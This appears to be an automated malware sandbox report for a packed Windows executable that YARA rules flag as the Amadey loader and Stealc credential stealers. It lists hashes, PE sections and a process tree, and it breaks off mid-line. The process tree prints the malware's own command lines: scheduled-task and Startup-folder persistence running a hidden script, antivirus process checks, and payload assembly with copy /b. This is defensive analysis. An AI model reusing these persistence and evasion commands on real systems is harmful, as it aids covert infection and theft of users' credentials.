SHA-256:	1DE5E6A25ECD4809B3159F7C8692924C6C858DB5E84849B64FD9EED5CCB9C38C
SHA-512:	497295FA415DAF2A009B7F14BD07C2BF85FBF4A21AD387538C1D15BD5ACD531E188F517ACAFFB7D242FD195B17BEE7A46C0B327A7B9BB988BFD79A326CF17355
Malicious:	false
Reputation:	unknown
Preview:	.....d.\.)I.R{..J.1F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0................. .@3P.........................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.468209885535901
Encrypted:	false
SSDEEP:	6144:tIXfpi67eLPU9skLmb0b4BWSPKaJG8nAgejZMMhA2gX4WABl0uNAdwBCswSbE:+XD94BWlLZMM6YFHy+E
MD5:	32EAB7702F1353D618377E8D6FDB035E
SHA1:	0D9F845289C0875C27A52AACC31D9D9D45410ECB
SHA-256:	6DBB2C70A61D187439D0C5AE396EB9D19BD3910BDF2618FB917DAF684D939C12
SHA-512:	405E98BCEC75386AD63A1B4CE5A3B8CF667958C19C57CD7D4E13F6C598B7454DDC5A6DEDC05F7A9AE49B0595A9B1A522B5BCE1274E4C4305EAA8419E3B4D9110
Malicious:	false
Reputation:	unknown
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..C.Q,..............................................................................................................................................................................................................................................................................................................................................y.U.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.951605134382561
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'920'512 bytes
MD5:	aa78aafb0a66c7ddf96d87d24b5c3afc
SHA1:	29c96a9c0c5cb916ca8c09db1c4b2f7c3d4d7ffa
SHA256:	cd5327ade58bdcbd9e18407525a8c54ae311c97c512f0931173432f83d4d4d4a
SHA512:	c53d701fbd62362d9ff1bca4cce04ac5e9e4241b9b1fc209412ceba276c02daa427f3646ab11f97081fd4a7e75f041bd87b988e2e1d40730c06f01f3916c4129
SSDEEP:	24576:AWemn+0tRj4PTf2iljxPHZoVfPUn+TFaYyug5ATvJ70JiLH87inEvrRf6OagwTQQ:EmdR07Nlby6sYShQing6OkQpwn
TLSH:	639533361D3A8EFFD44E6073388FD1BB93D15701257DC823169AAABB4739A712BB9104
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x8be000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FAF789AF39Ah
cvttps2pi mm3, qword ptr [00000000h]
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [ecx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [edx], ecx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add cl, byte ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or byte ptr [eax+00000000h], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [edx], ecx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
sbb al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [edx], ecx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
and al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x4d8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4bbbd8	0x10	keanncem
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4bbb88	0x18	keanncem
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x2de00	477bb68ad70974c443ea485c9f8690e0	False	0.9971687670299727	data	7.980336240605662	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x4d8	0x400	7a5bfa8377eea1d682bb690ad4709495	False	0.587890625	data	5.012681075848687	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6b000	0x2ae000	0x200	2799c7bfd89b90fdb6899a95b8493f46	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
keanncem	0x319000	0x1a4000	0x1a3200	bcab83056f8881aff736d219bbb03ea6	False	0.994250135140173	data	7.953870003541859	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
dteokgfa	0x4bd000	0x1000	0x400	282b9b9dce3785fc60eed157e86faa68	False	0.759765625	data	6.05599858561289	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x4be000	0x3000	0x2200	4f460497692629fd926cc4627cf2060c	False	0.07157628676470588	DOS executable (COM)	0.8976988482715617	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x4bbbe8	0x2e6	XML 1.0 document, ASCII text, with CRLF line terminators			0.45417789757412397
RT_MANIFEST	0x4bbece	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Target ID:	0
Start time:	07:31:57
Start date:	01/11/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xcd0000
File size:	1'920'512 bytes
MD5 hash:	AA78AAFB0A66C7DDF96D87D24B5C3AFC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1688467424.0000000004940000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1729894674.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	07:32:00
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Imagebase:	0x840000
File size:	1'920'512 bytes
MD5 hash:	AA78AAFB0A66C7DDF96D87D24B5C3AFC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.1758351370.0000000000841000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.1718075607.0000000005050000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 47%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	07:33:00
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0x840000
File size:	1'920'512 bytes
MD5 hash:	AA78AAFB0A66C7DDF96D87D24B5C3AFC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000005.00000003.2317904787.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	07:33:05
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe"
Imagebase:	0xf10000
File size:	314'368 bytes
MD5 hash:	68A99CF42959DC6406AF26E91D39F523
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000006.00000000.2360564124.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2615206943.00000000017B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000006.00000000.2360588213.0000000000F2E000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000006.00000002.2612862964.0000000000F11000.00000080.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000006.00000002.2615206943.000000000176E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000006.00000002.2612923701.0000000000F2E000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, Author: Joe Security
Antivirus matches:	Detection: 76%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	07:33:17
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe"
Imagebase:	0x330000
File size:	7'110'656 bytes
MD5 hash:	87E4E869971CEC9573811040F6140157
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 32%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	07:33:24
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe"
Imagebase:	0x400000
File size:	1'224'767 bytes
MD5 hash:	5D97C2475C8A4D52E140EF4650D1028B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	07:33:25
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	07:33:25
Start date:	01/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	07:33:27
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x200000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	07:33:27
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "wrsa opssvc"
Imagebase:	0x850000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	07:33:28
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x200000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	07:33:28
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Imagebase:	0x850000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	07:33:29
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 197036
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	07:33:29
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "CRAWFORDFILLEDVERIFYSCALE" Mtv
Imagebase:	0x850000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	07:33:29
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Twisted + ..\Molecular + ..\Sponsorship + ..\Various + ..\Witch + ..\Spirit + ..\See + ..\Fitting T
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	07:33:29
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif
Wow64 process (32bit):	true
Commandline:	Jurisdiction.pif T
Imagebase:	0xdb0000
File size:	893'608 bytes
MD5 hash:	18CE19B57F43CE0A5AF149C96AECC685
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 5%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	07:33:29
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0x2c0000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	07:33:30
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	07:33:30
Start date:	01/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	07:33:30
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F
Imagebase:	0x550000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	07:33:30
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url" & echo URL="C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url" & exit
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	07:33:30
Start date:	01/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	07:33:30
Start date:	01/11/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js"
Imagebase:	0x7ff6df620000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	07:33:34
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe"
Imagebase:	0x3a0000
File size:	5'952'512 bytes
MD5 hash:	5009B1EF6619ECA039925510D4FD51A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001B.00000003.2732256893.000000000124A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001B.00000003.2754649701.000000000124A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001B.00000003.2785879104.000000000124A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001B.00000003.2804806549.000000000124A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001B.00000003.2732759831.000000000124A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001B.00000003.2753208386.000000000124A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001B.00000003.2780168317.000000000124A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001B.00000003.2731444217.000000000124A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001B.00000003.2877420998.000000000124E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 61%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	07:33:37
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O"
Imagebase:	0x720000
File size:	893'608 bytes
MD5 hash:	18CE19B57F43CE0A5AF149C96AECC685
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 5%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	07:33:38
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe"
Imagebase:	0x5e0000
File size:	526'848 bytes
MD5 hash:	26D8D52BAC8F4615861F39E118EFA28D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 50%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	07:33:41
Start date:	01/11/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js"
Imagebase:	0x7ff6df620000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	07:33:41
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O"
Imagebase:	0x720000
File size:	893'608 bytes
MD5 hash:	18CE19B57F43CE0A5AF149C96AECC685
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	07:33:47
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe"
Imagebase:	0x830000
File size:	2'980'864 bytes
MD5 hash:	4FD1ED99BAAA6E9AC510D0C468D900BD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000021.00000003.3197330580.00000000012E4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000021.00000003.2995423907.00000000012F1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000021.00000003.3148528207.00000000012E4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000021.00000003.2894968481.00000000012F5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000021.00000003.2895449754.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000021.00000003.3124289253.00000000012F7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000021.00000003.3124530510.0000000001309000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000021.00000003.3026321552.00000000012EF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000021.00000003.2999744421.00000000012F5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000021.00000003.2996701233.00000000012F5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, 